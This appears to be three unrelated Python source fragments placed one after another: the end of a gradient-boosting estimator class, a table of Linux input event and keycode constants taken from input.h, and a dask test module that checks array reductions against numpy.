            gradient = shrinkd(1, self.loss_function.negative_gradient(**valmap(shrinkd(1), gradient_args)))
        self.coefficients_ = coefficients
        self.estimators_ = estimators
        self.losses_ = losses
        self.score_ = (self.initial_loss_ - loss) / self.initial_loss_
        self.estimator_ = LinearCombination(self.estimators_, self.coefficients_)
        self._create_delegates('estimator', ['syms'])
        return self

    def statistic_over_steps(self, X, y, statistic, exposure=None):
        """Evaluate ``statistic(y, pred)`` for successively longer prefixes of
        the fitted ensemble (learning-curve style diagnostics).

        ``exposure`` is accepted for interface compatibility but is not used
        by the prefix models' predict calls (matching historical behavior).
        """
        result = []
        for n_stages in range(1, len(self.estimators_) + 1):
            model = LinearCombination(self.estimators_[:n_stages], self.coefficients_[:n_stages])
            pred = model.predict(X)
            result.append(statistic(y, pred))
        return result

    def score(self, X, y, sample_weight=None, exposure=None):
        """Fraction of the initial-stage loss removed by boosting on (X, y)."""
        partial_arguments = self._process_args(y=y, sample_weight=sample_weight, exposure=exposure)
        predict_arguments = self._process_args(X=X, exposure=exposure)
        loss_function = lambda pred: self.loss_function(pred=shrinkd(1, pred), **valmap(shrinkd(1), partial_arguments))
        prediction = shrinkd(1, self.predict(**predict_arguments))
        loss = loss_function(prediction)
        initial_prediction = shrinkd(1, self.coefficients_[0] * self.estimators_[0].predict(**predict_arguments))
        initial_loss = loss_function(initial_prediction)
        return (initial_loss - loss) / initial_loss

    def transform(self, X, exposure=None):
        """Concatenate transforms of all boosting stages (the initial constant
        estimator is skipped)."""
        if not hasattr(self, 'estimator_'):
            raise NotFittedError()
        args = self._process_args(X=X, exposure=exposure)
        return np.concatenate([est.transform(**args) for est in self.estimators_[1:]], axis=1)

    def predict(self, X, exposure=None):
        """Predict; classification losses map the raw score to a decision."""
        if not hasattr(self, 'estimator_'):
            raise NotFittedError()
        pred_args = self._process_args(X=X, exposure=exposure)
        score = self.estimator_.predict(**pred_args)
        if hasattr(self.loss_function, '_score_to_decision'):
            return self.loss_function._score_to_decision(score)
        return score

    def sym_predict(self):
        """Symbolic expression equivalent of :meth:`predict`."""
        if not hasattr(self, 'estimator_'):
            raise NotFittedError()
        inner = sym_predict(self.estimator_)
        if hasattr(self.loss_function, '_score_to_decision'):
            outer = sym_score_to_decision(self.loss_function)
            variable = syms(self.loss_function)[0]
            return outer.subs({variable: inner})
        return inner

    def predict_proba(self, X, exposure=None):
        """Class probabilities; requires the loss to define _score_to_proba."""
        if not hasattr(self, 'estimator_'):
            raise NotFittedError()
        if not hasattr(self.loss_function, '_score_to_proba'):
            raise AttributeError()
        pred_args = self._process_args(X=X, exposure=exposure)
        score = self.estimator_.predict(**pred_args)
        return self.loss_function._score_to_proba(score)

    def sym_predict_proba(self):
        """Symbolic expression equivalent of :meth:`predict_proba`."""
        if not hasattr(self, 'estimator_'):
            raise NotFittedError()
        inner = sym_predict(self.estimator_)
        if hasattr(self.loss_function, '_score_to_proba'):
            outer = sym_score_to_proba(self.loss_function)
            variable = syms(self.loss_function)[0]
            return outer.subs({variable: inner})
        return inner

    def decision_function(self, X, exposure=None):
        """Raw ensemble score; only defined for classification losses."""
        if not hasattr(self.loss_function, '_score_to_decision'):
            raise AttributeError()
        if not hasattr(self, 'estimator_'):
            raise NotFittedError()
        pred_args = self._process_args(X=X, exposure=exposure)
        score = self.estimator_.predict(**pred_args)
        return score

    def sym_decision_function(self):
        """Symbolic expression equivalent of :meth:`decision_function`."""
        if not hasattr(self.loss_function, '_score_to_decision'):
            raise AttributeError()
        if not hasattr(self, 'estimator_'):
            raise NotFittedError()
        return sym_predict(self.estimator_)

    @property
    def _estimator_type(self):
        # 'classifier' when the loss can map scores to class decisions.
        if hasattr(self.loss_function, '_score_to_decision'):
            return 'classifier'
        return 'regressor'
| |
#
# scancodes, ripped straight from /usr/include/linux/input.h
#
# Event type codes (EV_*): top-level classes of input events.
EV_VERSION = 0x010000
EV_SYN = 0x00
EV_KEY = 0x01
EV_REL = 0x02
EV_ABS = 0x03
EV_MSC = 0x04
EV_SW = 0x05
EV_LED = 0x11
EV_SND = 0x12
EV_REP = 0x14
EV_FF = 0x15
EV_PWR = 0x16
EV_FF_STATUS = 0x17
EV_MAX = 0x1f
EV_CNT = (EV_MAX+1)
# Synchronization event codes (SYN_*).
SYN_REPORT = 0
SYN_CONFIG = 1
SYN_MT_REPORT = 2
# Keyboard key codes (KEY_*); values match the kernel's keymap.
KEY_RESERVED = 0
KEY_ESC = 1
KEY_1 = 2
KEY_2 = 3
KEY_3 = 4
KEY_4 = 5
KEY_5 = 6
KEY_6 = 7
KEY_7 = 8
KEY_8 = 9
KEY_9 = 10
KEY_0 = 11
KEY_MINUS = 12
KEY_EQUAL = 13
KEY_BACKSPACE = 14
KEY_TAB = 15
KEY_Q = 16
KEY_W = 17
KEY_E = 18
KEY_R = 19
KEY_T = 20
KEY_Y = 21
KEY_U = 22
KEY_I = 23
KEY_O = 24
KEY_P = 25
KEY_LEFTBRACE = 26
KEY_RIGHTBRACE = 27
KEY_ENTER = 28
KEY_LEFTCTRL = 29
KEY_A = 30
KEY_S = 31
KEY_D = 32
KEY_F = 33
KEY_G = 34
KEY_H = 35
KEY_J = 36
KEY_K = 37
KEY_L = 38
KEY_SEMICOLON = 39
KEY_APOSTROPHE = 40
KEY_GRAVE = 41
KEY_LEFTSHIFT = 42
KEY_BACKSLASH = 43
KEY_Z = 44
KEY_X = 45
KEY_C = 46
KEY_V = 47
KEY_B = 48
KEY_N = 49
KEY_M = 50
KEY_COMMA = 51
KEY_DOT = 52
KEY_SLASH = 53
KEY_RIGHTSHIFT = 54
KEY_KPASTERISK = 55
KEY_LEFTALT = 56
KEY_SPACE = 57
KEY_CAPSLOCK = 58
KEY_F1 = 59
KEY_F2 = 60
KEY_F3 = 61
KEY_F4 = 62
KEY_F5 = 63
KEY_F6 = 64
KEY_F7 = 65
KEY_F8 = 66
KEY_F9 = 67
KEY_F10 = 68
KEY_NUMLOCK = 69
KEY_SCROLLLOCK = 70
KEY_KP7 = 71
KEY_KP8 = 72
KEY_KP9 = 73
KEY_KPMINUS = 74
KEY_KP4 = 75
KEY_KP5 = 76
KEY_KP6 = 77
KEY_KPPLUS = 78
KEY_KP1 = 79
KEY_KP2 = 80
KEY_KP3 = 81
KEY_KP0 = 82
KEY_KPDOT = 83
# Note: code 84 is intentionally unassigned (as in the kernel header).
KEY_ZENKAKUHANKAKU = 85
KEY_102ND = 86
KEY_F11 = 87
KEY_F12 = 88
KEY_RO = 89
KEY_KATAKANA = 90
KEY_HIRAGANA = 91
KEY_HENKAN = 92
KEY_KATAKANAHIRAGANA = 93
KEY_MUHENKAN = 94
KEY_KPJPCOMMA = 95
KEY_KPENTER = 96
KEY_RIGHTCTRL = 97
KEY_KPSLASH = 98
KEY_SYSRQ = 99
KEY_RIGHTALT = 100
KEY_LINEFEED = 101
KEY_HOME = 102
KEY_UP = 103
KEY_PAGEUP = 104
KEY_LEFT = 105
KEY_RIGHT = 106
KEY_END = 107
KEY_DOWN = 108
KEY_PAGEDOWN = 109
KEY_INSERT = 110
KEY_DELETE = 111
KEY_MACRO = 112
KEY_MUTE = 113
KEY_VOLUMEDOWN = 114
KEY_VOLUMEUP = 115
KEY_POWER = 116  # SC System Power Down
KEY_KPEQUAL = 117
KEY_KPPLUSMINUS = 118
KEY_PAUSE = 119
KEY_SCALE = 120  # AL Compiz Scale (Expose)
KEY_KPCOMMA = 121
KEY_HANGEUL = 122
KEY_HANGUEL = KEY_HANGEUL  # legacy misspelled alias kept by the kernel
KEY_HANJA = 123
KEY_YEN = 124
KEY_LEFTMETA = 125
KEY_RIGHTMETA = 126
KEY_COMPOSE = 127
KEY_STOP = 128  # AC Stop
KEY_AGAIN = 129
KEY_PROPS = 130  # AC Properties
KEY_UNDO = 131  # AC Undo
KEY_FRONT = 132
KEY_COPY = 133  # AC Copy
KEY_OPEN = 134  # AC Open
KEY_PASTE = 135  # AC Paste
KEY_FIND = 136  # AC Search
KEY_CUT = 137  # AC Cut
KEY_HELP = 138  # AL Integrated Help Center
KEY_MENU = 139  # Menu (show menu)
KEY_CALC = 140  # AL Calculator
KEY_SETUP = 141
KEY_SLEEP = 142  # SC System Sleep
KEY_WAKEUP = 143  # System Wake Up
KEY_FILE = 144  # AL Local Machine Browser
KEY_SENDFILE = 145
KEY_DELETEFILE = 146
KEY_XFER = 147
KEY_PROG1 = 148
KEY_PROG2 = 149
KEY_WWW = 150  # AL Internet Browser
KEY_MSDOS = 151
KEY_COFFEE = 152  # AL Terminal Lock/Screensaver
KEY_SCREENLOCK = KEY_COFFEE
KEY_DIRECTION = 153
KEY_CYCLEWINDOWS = 154
KEY_MAIL = 155
KEY_BOOKMARKS = 156  # AC Bookmarks
KEY_COMPUTER = 157
KEY_BACK = 158  # AC Back
KEY_FORWARD = 159  # AC Forward
KEY_CLOSECD = 160
KEY_EJECTCD = 161
KEY_EJECTCLOSECD = 162
KEY_NEXTSONG = 163
KEY_PLAYPAUSE = 164
KEY_PREVIOUSSONG = 165
KEY_STOPCD = 166
KEY_RECORD = 167
KEY_REWIND = 168
KEY_PHONE = 169  # Media Select Telephone
KEY_ISO = 170
KEY_CONFIG = 171  # AL Consumer Control Configuration
KEY_HOMEPAGE = 172  # AC Home
KEY_REFRESH = 173  # AC Refresh
KEY_EXIT = 174  # AC Exit
KEY_MOVE = 175
KEY_EDIT = 176
KEY_SCROLLUP = 177
KEY_SCROLLDOWN = 178
KEY_KPLEFTPAREN = 179
KEY_KPRIGHTPAREN = 180
KEY_NEW = 181  # AC New
KEY_REDO = 182  # AC Redo/Repeat
KEY_F13 = 183
KEY_F14 = 184
KEY_F15 = 185
KEY_F16 = 186
KEY_F17 = 187
KEY_F18 = 188
KEY_F19 = 189
KEY_F20 = 190
KEY_F21 = 191
KEY_F22 = 192
KEY_F23 = 193
KEY_F24 = 194
KEY_PLAYCD = 200
KEY_PAUSECD = 201
KEY_PROG3 = 202
KEY_PROG4 = 203
KEY_DASHBOARD = 204  # AL Dashboard
KEY_SUSPEND = 205
KEY_CLOSE = 206  # AC Close
KEY_PLAY = 207
KEY_FASTFORWARD = 208
KEY_BASSBOOST = 209
KEY_PRINT = 210  # AC Print
KEY_HP = 211
KEY_CAMERA = 212
KEY_SOUND = 213
KEY_QUESTION = 214
KEY_EMAIL = 215
KEY_CHAT = 216
KEY_SEARCH = 217
KEY_CONNECT = 218
KEY_FINANCE = 219  # AL Checkbook/Finance
KEY_SPORT = 220
KEY_SHOP = 221
KEY_ALTERASE = 222
KEY_CANCEL = 223  # AC Cancel
KEY_BRIGHTNESSDOWN = 224
KEY_BRIGHTNESSUP = 225
KEY_MEDIA = 226
KEY_SWITCHVIDEOMODE = 227  # Cycle between available video
KEY_KBDILLUMTOGGLE = 228
KEY_KBDILLUMDOWN = 229
KEY_KBDILLUMUP = 230
KEY_SEND = 231  # AC Send
KEY_REPLY = 232  # AC Reply
KEY_FORWARDMAIL = 233  # AC Forward Msg
KEY_SAVE = 234  # AC Save
KEY_DOCUMENTS = 235
KEY_BATTERY = 236
KEY_BLUETOOTH = 237
KEY_WLAN = 238
KEY_UWB = 239
KEY_UNKNOWN = 240
KEY_VIDEO_NEXT = 241  # drive next video source
KEY_VIDEO_PREV = 242  # drive previous video source
KEY_BRIGHTNESS_CYCLE = 243  # brightness up, after max is min
KEY_BRIGHTNESS_ZERO = 244  # brightness off, use ambient
KEY_DISPLAY_OFF = 245  # display device to off state
KEY_WIMAX = 246
# Button codes (BTN_*): mice, joysticks, gamepads and digitizer tools.
BTN_MISC = 0x100
BTN_0 = 0x100
BTN_1 = 0x101
BTN_2 = 0x102
BTN_3 = 0x103
BTN_4 = 0x104
BTN_5 = 0x105
BTN_6 = 0x106
BTN_7 = 0x107
BTN_8 = 0x108
BTN_9 = 0x109
BTN_MOUSE = 0x110
BTN_LEFT = 0x110
BTN_RIGHT = 0x111
BTN_MIDDLE = 0x112
BTN_SIDE = 0x113
BTN_EXTRA = 0x114
BTN_FORWARD = 0x115
BTN_BACK = 0x116
BTN_TASK = 0x117
BTN_JOYSTICK = 0x120
BTN_TRIGGER = 0x120
BTN_THUMB = 0x121
BTN_THUMB2 = 0x122
BTN_TOP = 0x123
BTN_TOP2 = 0x124
BTN_PINKIE = 0x125
BTN_BASE = 0x126
BTN_BASE2 = 0x127
BTN_BASE3 = 0x128
BTN_BASE4 = 0x129
BTN_BASE5 = 0x12a
BTN_BASE6 = 0x12b
BTN_DEAD = 0x12f
BTN_GAMEPAD = 0x130
BTN_A = 0x130
BTN_B = 0x131
BTN_C = 0x132
BTN_X = 0x133
BTN_Y = 0x134
BTN_Z = 0x135
BTN_TL = 0x136
BTN_TR = 0x137
BTN_TL2 = 0x138
BTN_TR2 = 0x139
BTN_SELECT = 0x13a
BTN_START = 0x13b
BTN_MODE = 0x13c
BTN_THUMBL = 0x13d
BTN_THUMBR = 0x13e
BTN_DIGI = 0x140
BTN_TOOL_PEN = 0x140
BTN_TOOL_RUBBER = 0x141
BTN_TOOL_BRUSH = 0x142
BTN_TOOL_PENCIL = 0x143
BTN_TOOL_AIRBRUSH = 0x144
BTN_TOOL_FINGER = 0x145
BTN_TOOL_MOUSE = 0x146
BTN_TOOL_LENS = 0x147
BTN_TOUCH = 0x14a
BTN_STYLUS = 0x14b
BTN_STYLUS2 = 0x14c
BTN_TOOL_DOUBLETAP = 0x14d
BTN_TOOL_TRIPLETAP = 0x14e
BTN_TOOL_QUADTAP = 0x14f  # Four fingers on trackpad
BTN_WHEEL = 0x150
BTN_GEAR_DOWN = 0x150
BTN_GEAR_UP = 0x151
# Remote-control / media / application-launch key codes (0x160..0x20b),
# followed by the KEY_* range markers.
KEY_OK = 0x160
KEY_SELECT = 0x161
KEY_GOTO = 0x162
KEY_CLEAR = 0x163
KEY_POWER2 = 0x164
KEY_OPTION = 0x165
KEY_INFO = 0x166 # AL OEM Features/Tips/Tutorial
KEY_TIME = 0x167
KEY_VENDOR = 0x168
KEY_ARCHIVE = 0x169
KEY_PROGRAM = 0x16a # Media Select Program Guide
KEY_CHANNEL = 0x16b
KEY_FAVORITES = 0x16c
KEY_EPG = 0x16d
KEY_PVR = 0x16e # Media Select Home
KEY_MHP = 0x16f
KEY_LANGUAGE = 0x170
KEY_TITLE = 0x171
KEY_SUBTITLE = 0x172
KEY_ANGLE = 0x173
KEY_ZOOM = 0x174
KEY_MODE = 0x175
KEY_KEYBOARD = 0x176
KEY_SCREEN = 0x177
KEY_PC = 0x178 # Media Select Computer
KEY_TV = 0x179 # Media Select TV
KEY_TV2 = 0x17a # Media Select Cable
KEY_VCR = 0x17b # Media Select VCR
KEY_VCR2 = 0x17c # VCR Plus
KEY_SAT = 0x17d # Media Select Satellite
KEY_SAT2 = 0x17e
KEY_CD = 0x17f # Media Select CD
KEY_TAPE = 0x180 # Media Select Tape
KEY_RADIO = 0x181
KEY_TUNER = 0x182 # Media Select Tuner
KEY_PLAYER = 0x183
KEY_TEXT = 0x184
KEY_DVD = 0x185 # Media Select DVD
KEY_AUX = 0x186
KEY_MP3 = 0x187
KEY_AUDIO = 0x188
KEY_VIDEO = 0x189
KEY_DIRECTORY = 0x18a
KEY_LIST = 0x18b
KEY_MEMO = 0x18c # Media Select Messages
KEY_CALENDAR = 0x18d
KEY_RED = 0x18e
KEY_GREEN = 0x18f
KEY_YELLOW = 0x190
KEY_BLUE = 0x191
KEY_CHANNELUP = 0x192 # Channel Increment
KEY_CHANNELDOWN = 0x193 # Channel Decrement
KEY_FIRST = 0x194
KEY_LAST = 0x195 # Recall Last
KEY_AB = 0x196
KEY_NEXT = 0x197
KEY_RESTART = 0x198
KEY_SLOW = 0x199
KEY_SHUFFLE = 0x19a
KEY_BREAK = 0x19b
KEY_PREVIOUS = 0x19c
KEY_DIGITS = 0x19d
KEY_TEEN = 0x19e
KEY_TWEN = 0x19f
KEY_VIDEOPHONE = 0x1a0 # Media Select Video Phone
KEY_GAMES = 0x1a1 # Media Select Games
KEY_ZOOMIN = 0x1a2 # AC Zoom In
KEY_ZOOMOUT = 0x1a3 # AC Zoom Out
KEY_ZOOMRESET = 0x1a4 # AC Zoom
KEY_WORDPROCESSOR = 0x1a5 # AL Word Processor
KEY_EDITOR = 0x1a6 # AL Text Editor
KEY_SPREADSHEET = 0x1a7 # AL Spreadsheet
KEY_GRAPHICSEDITOR = 0x1a8 # AL Graphics Editor
KEY_PRESENTATION = 0x1a9 # AL Presentation App
KEY_DATABASE = 0x1aa # AL Database App
KEY_NEWS = 0x1ab # AL Newsreader
KEY_VOICEMAIL = 0x1ac # AL Voicemail
KEY_ADDRESSBOOK = 0x1ad # AL Contacts/Address Book
KEY_MESSENGER = 0x1ae # AL Instant Messaging
KEY_DISPLAYTOGGLE = 0x1af # Turn display (LCD) on and off
KEY_SPELLCHECK = 0x1b0 # AL Spell Check
KEY_LOGOFF = 0x1b1 # AL Logoff
KEY_DOLLAR = 0x1b2
KEY_EURO = 0x1b3
KEY_FRAMEBACK = 0x1b4 # Consumer - transport controls
KEY_FRAMEFORWARD = 0x1b5
KEY_CONTEXT_MENU = 0x1b6 # GenDesc - system context menu
KEY_MEDIA_REPEAT = 0x1b7 # Consumer - transport control
KEY_DEL_EOL = 0x1c0
KEY_DEL_EOS = 0x1c1
KEY_INS_LINE = 0x1c2
KEY_DEL_LINE = 0x1c3
# Fn-layer key codes.
KEY_FN = 0x1d0
KEY_FN_ESC = 0x1d1
KEY_FN_F1 = 0x1d2
KEY_FN_F2 = 0x1d3
KEY_FN_F3 = 0x1d4
KEY_FN_F4 = 0x1d5
KEY_FN_F5 = 0x1d6
KEY_FN_F6 = 0x1d7
KEY_FN_F7 = 0x1d8
KEY_FN_F8 = 0x1d9
KEY_FN_F9 = 0x1da
KEY_FN_F10 = 0x1db
KEY_FN_F11 = 0x1dc
KEY_FN_F12 = 0x1dd
KEY_FN_1 = 0x1de
KEY_FN_2 = 0x1df
KEY_FN_D = 0x1e0
KEY_FN_E = 0x1e1
KEY_FN_F = 0x1e2
KEY_FN_S = 0x1e3
KEY_FN_B = 0x1e4
# Braille display dot codes.
KEY_BRL_DOT1 = 0x1f1
KEY_BRL_DOT2 = 0x1f2
KEY_BRL_DOT3 = 0x1f3
KEY_BRL_DOT4 = 0x1f4
KEY_BRL_DOT5 = 0x1f5
KEY_BRL_DOT6 = 0x1f6
KEY_BRL_DOT7 = 0x1f7
KEY_BRL_DOT8 = 0x1f8
KEY_BRL_DOT9 = 0x1f9
KEY_BRL_DOT10 = 0x1fa
KEY_NUMERIC_0 = 0x200 # used by phones, remote controls,
KEY_NUMERIC_1 = 0x201 # and other keypads
KEY_NUMERIC_2 = 0x202
KEY_NUMERIC_3 = 0x203
KEY_NUMERIC_4 = 0x204
KEY_NUMERIC_5 = 0x205
KEY_NUMERIC_6 = 0x206
KEY_NUMERIC_7 = 0x207
KEY_NUMERIC_8 = 0x208
KEY_NUMERIC_9 = 0x209
KEY_NUMERIC_STAR = 0x20a
KEY_NUMERIC_POUND = 0x20b
# Range markers: lowest "interesting" key, highest possible code, and count.
KEY_MIN_INTERESTING = KEY_MUTE
KEY_MAX = 0x2ff
KEY_CNT = (KEY_MAX+1)
# Relative axis codes (EV_REL events: mice, wheels, dials).
REL_X = 0x00
REL_Y = 0x01
REL_Z = 0x02
REL_RX = 0x03
REL_RY = 0x04
REL_RZ = 0x05
REL_HWHEEL = 0x06
REL_DIAL = 0x07
REL_WHEEL = 0x08
REL_MISC = 0x09
REL_MAX = 0x0f
REL_CNT = (REL_MAX+1)
# Absolute axis codes (EV_ABS events: joysticks, tablets, touchscreens).
ABS_X = 0x00
ABS_Y = 0x01
ABS_Z = 0x02
ABS_RX = 0x03
ABS_RY = 0x04
ABS_RZ = 0x05
ABS_THROTTLE = 0x06
ABS_RUDDER = 0x07
ABS_WHEEL = 0x08
ABS_GAS = 0x09
ABS_BRAKE = 0x0a
ABS_HAT0X = 0x10
ABS_HAT0Y = 0x11
ABS_HAT1X = 0x12
ABS_HAT1Y = 0x13
ABS_HAT2X = 0x14
ABS_HAT2Y = 0x15
ABS_HAT3X = 0x16
ABS_HAT3Y = 0x17
ABS_PRESSURE = 0x18
ABS_DISTANCE = 0x19
ABS_TILT_X = 0x1a
ABS_TILT_Y = 0x1b
ABS_TOOL_WIDTH = 0x1c
ABS_VOLUME = 0x20
ABS_MISC = 0x28
# Multitouch (MT) axis codes.
ABS_MT_TOUCH_MAJOR = 0x30 # Major axis of touching ellipse
ABS_MT_TOUCH_MINOR = 0x31 # Minor axis (omit if circular)
ABS_MT_WIDTH_MAJOR = 0x32 # Major axis of approaching ellipse
ABS_MT_WIDTH_MINOR = 0x33 # Minor axis (omit if circular)
ABS_MT_ORIENTATION = 0x34 # Ellipse orientation
ABS_MT_POSITION_X = 0x35 # Center X ellipse position
ABS_MT_POSITION_Y = 0x36 # Center Y ellipse position
ABS_MT_TOOL_TYPE = 0x37 # Type of touching device
ABS_MT_BLOB_ID = 0x38 # Group a set of packets as a blob
ABS_MT_TRACKING_ID = 0x39 # Unique ID of initiated contact
ABS_MAX = 0x3f
ABS_CNT = (ABS_MAX+1)
# Switch event codes (EV_SW: binary hardware state).
SW_LID = 0x00 # set = lid shut
SW_TABLET_MODE = 0x01 # set = tablet mode
SW_HEADPHONE_INSERT = 0x02 # set = inserted
SW_RFKILL_ALL = 0x03 # rfkill master switch, type "any"
SW_RADIO = SW_RFKILL_ALL # deprecated
SW_MICROPHONE_INSERT = 0x04 # set = inserted
SW_DOCK = 0x05 # set = plugged into dock
SW_LINEOUT_INSERT = 0x06 # set = inserted
SW_JACK_PHYSICAL_INSERT = 0x07 # set = mechanical switch set
SW_VIDEOOUT_INSERT = 0x08 # set = inserted
SW_MAX = 0x0f
SW_CNT = (SW_MAX+1)
# Miscellaneous event codes (EV_MSC).
MSC_SERIAL = 0x00
MSC_PULSELED = 0x01
MSC_GESTURE = 0x02
MSC_RAW = 0x03
MSC_SCAN = 0x04
MSC_MAX = 0x07
MSC_CNT = (MSC_MAX+1)
# LED codes (EV_LED).
LED_NUML = 0x00
LED_CAPSL = 0x01
LED_SCROLLL = 0x02
LED_COMPOSE = 0x03
LED_KANA = 0x04
LED_SLEEP = 0x05
LED_SUSPEND = 0x06
LED_MUTE = 0x07
LED_MISC = 0x08
LED_MAIL = 0x09
LED_CHARGING = 0x0a
LED_MAX = 0x0f
LED_CNT = (LED_MAX+1)
# Autorepeat parameters (EV_REP).
REP_DELAY = 0x00
REP_PERIOD = 0x01
REP_MAX = 0x01
# Sound codes (EV_SND).
SND_CLICK = 0x00
SND_BELL = 0x01
SND_TONE = 0x02
SND_MAX = 0x07
SND_CNT = (SND_MAX+1)
# Indices into a device's id array (bus type, vendor, product, version).
ID_BUS = 0
ID_VENDOR = 1
ID_PRODUCT = 2
ID_VERSION = 3
# Bus types.
BUS_PCI = 0x01
BUS_ISAPNP = 0x02
BUS_USB = 0x03
BUS_HIL = 0x04
BUS_BLUETOOTH = 0x05
BUS_VIRTUAL = 0x06
BUS_ISA = 0x10
BUS_I8042 = 0x11
BUS_XTKBD = 0x12
BUS_RS232 = 0x13
BUS_GAMEPORT = 0x14
BUS_PARPORT = 0x15
BUS_AMIGA = 0x16
BUS_ADB = 0x17
BUS_I2C = 0x18
BUS_HOST = 0x19
BUS_GSC = 0x1A
BUS_ATARI = 0x1B
# Multitouch tool types (values for ABS_MT_TOOL_TYPE).
MT_TOOL_FINGER = 0
MT_TOOL_PEN = 1
# Force-feedback status and effect codes (EV_FF).
FF_STATUS_STOPPED = 0x00
FF_STATUS_PLAYING = 0x01
FF_STATUS_MAX = 0x01
FF_RUMBLE = 0x50
FF_PERIODIC = 0x51
FF_CONSTANT = 0x52
FF_SPRING = 0x53
FF_FRICTION = 0x54
FF_DAMPER = 0x55
FF_INERTIA = 0x56
FF_RAMP = 0x57
FF_EFFECT_MIN = FF_RUMBLE
FF_EFFECT_MAX = FF_RAMP
# Waveforms usable with FF_PERIODIC effects.
FF_SQUARE = 0x58
FF_TRIANGLE = 0x59
FF_SINE = 0x5a
FF_SAW_UP = 0x5b
FF_SAW_DOWN = 0x5c
FF_CUSTOM = 0x5d
FF_WAVEFORM_MIN = FF_SQUARE
FF_WAVEFORM_MAX = FF_CUSTOM
# Device-level force-feedback properties.
FF_GAIN = 0x60
FF_AUTOCENTER = 0x61
FF_MAX = 0x7f
FF_CNT = (FF_MAX+1)
#__reverse = dict(map(lambda x: (x[1],x[0]), globals().items()))
| |
from __future__ import absolute_import, division, print_function
import pytest
pytest.importorskip('numpy')
import dask.array as da
from dask.array.utils import assert_eq as _assert_eq
from dask.core import get_deps
from dask.context import set_options
import numpy as np
# temporary until numpy functions migrated:
# prefer numpy's own nanprod; fall back to dask's numpy_compat shim
# on numpy versions that predate it.
try:
    from numpy import nanprod
except ImportError: # pragma: no cover
    import dask.array.numpy_compat as npcompat
    nanprod = npcompat.nanprod
def assert_eq(a, b):
    """Assert that two (dask or numpy) arrays are equal, treating NaNs as equal.

    Thin wrapper over :func:`dask.array.utils.assert_eq` that fixes
    ``equal_nan=True``, since many tests in this module exercise nan-aware
    reductions.
    """
    _assert_eq(a, b, equal_nan=True)
def same_keys(a, b):
    """Return True when both dask graphs contain exactly the same keys.

    String keys are padded to 4-tuples so they sort consistently next to
    the usual ``(name, i, j, ...)`` tuple keys.
    """
    def normalize(k):
        return (k, -1, -1, -1) if isinstance(k, str) else k
    return sorted(a.dask, key=normalize) == sorted(b.dask, key=normalize)
def reduction_1d_test(da_func, darr, np_func, narr, use_dtype=True, split_every=True):
    """Battery of checks for a 1-d dask reduction against its numpy twin.

    Verifies plain and ``keepdims`` results, deterministic graph keys,
    optional explicit ``dtype=`` arguments, and tree reduction via
    ``split_every`` (both the int and per-axis dict spellings).

    :param da_func: dask reduction, e.g. ``da.sum``
    :param darr: dask array input
    :param np_func: numpy counterpart, e.g. ``np.sum``
    :param narr: numpy array with the same contents as ``darr``
    :param use_dtype: also exercise explicit output dtypes
    :param split_every: also exercise tree reduction
    """
    assert_eq(da_func(darr), np_func(narr))
    assert_eq(da_func(darr, keepdims=True), np_func(narr, keepdims=True))
    # Building the same reduction twice must produce identical graph keys.
    assert same_keys(da_func(darr), da_func(darr))
    assert same_keys(da_func(darr, keepdims=True), da_func(darr, keepdims=True))
    if use_dtype:
        assert_eq(da_func(darr, dtype='f8'), np_func(narr, dtype='f8'))
        assert_eq(da_func(darr, dtype='i8'), np_func(narr, dtype='i8'))
        assert same_keys(da_func(darr, dtype='i8'), da_func(darr, dtype='i8'))
    if split_every:
        # An int split_every and the equivalent {axis: n} dict must agree.
        a1 = da_func(darr, split_every=2)
        a2 = da_func(darr, split_every={0: 2})
        assert same_keys(a1, a2)
        assert_eq(a1, np_func(narr))
        assert_eq(a2, np_func(narr))
        assert_eq(da_func(darr, keepdims=True, split_every=2),
                  np_func(narr, keepdims=True))
@pytest.mark.parametrize('dtype', ['f4', 'i4'])
def test_reductions_1D(dtype):
    """Run the 1-d reduction battery over every supported reduction.

    Each case is (dask reduction, numpy reference, exercise dtype kwarg);
    the nan-variants are checked against plain numpy references because the
    input contains no NaNs.
    """
    narr = np.arange(5).astype(dtype)
    darr = da.from_array(narr, chunks=(2,))
    cases = [
        (da.sum, np.sum, True),
        (da.prod, np.prod, True),
        (da.mean, np.mean, True),
        (da.var, np.var, True),
        (da.std, np.std, True),
        (da.min, np.min, False),
        (da.max, np.max, False),
        (da.any, np.any, False),
        (da.all, np.all, False),
        (da.nansum, np.nansum, True),
        (da.nanprod, nanprod, True),
        (da.nanmean, np.mean, True),
        (da.nanvar, np.var, True),
        (da.nanstd, np.std, True),
        (da.nanmin, np.nanmin, False),
        (da.nanmax, np.nanmax, False),
    ]
    for da_func, np_func, with_dtype in cases:
        reduction_1d_test(da_func, darr, np_func, narr, with_dtype)
def reduction_2d_test(da_func, darr, np_func, narr, use_dtype=True,
                      split_every=True):
    """Battery of checks for a 2-d dask reduction against its numpy twin.

    Like :func:`reduction_1d_test` but additionally exercises single-axis
    reductions (``axis=0`` / ``axis=1``), multi-axis tuples, and per-axis
    ``split_every`` tree reductions.

    :param da_func: dask reduction, e.g. ``da.sum``
    :param darr: 2-d dask array input
    :param np_func: numpy counterpart
    :param narr: numpy array with the same contents as ``darr``
    :param use_dtype: also exercise explicit output dtypes
    :param split_every: also exercise tree reduction
    """
    assert_eq(da_func(darr), np_func(narr))
    assert_eq(da_func(darr, keepdims=True), np_func(narr, keepdims=True))
    assert_eq(da_func(darr, axis=0), np_func(narr, axis=0))
    assert_eq(da_func(darr, axis=1), np_func(narr, axis=1))
    assert_eq(da_func(darr, axis=1, keepdims=True),
              np_func(narr, axis=1, keepdims=True))
    assert_eq(da_func(darr, axis=(1, 0)), np_func(narr, axis=(1, 0)))
    # Graph keys must be deterministic across rebuilds.
    assert same_keys(da_func(darr, axis=1), da_func(darr, axis=1))
    assert same_keys(da_func(darr, axis=(1, 0)), da_func(darr, axis=(1, 0)))
    if use_dtype:
        assert_eq(da_func(darr, dtype='f8'), np_func(narr, dtype='f8'))
        assert_eq(da_func(darr, dtype='i8'), np_func(narr, dtype='i8'))
    if split_every:
        # An int split_every and the equivalent per-axis dict must agree.
        a1 = da_func(darr, split_every=4)
        a2 = da_func(darr, split_every={0: 2, 1: 2})
        assert same_keys(a1, a2)
        assert_eq(a1, np_func(narr))
        assert_eq(a2, np_func(narr))
        assert_eq(da_func(darr, keepdims=True, split_every=4),
                  np_func(narr, keepdims=True))
        assert_eq(da_func(darr, axis=0, split_every=2), np_func(narr, axis=0))
        assert_eq(da_func(darr, axis=0, keepdims=True, split_every=2),
                  np_func(narr, axis=0, keepdims=True))
        assert_eq(da_func(darr, axis=1, split_every=2), np_func(narr, axis=1))
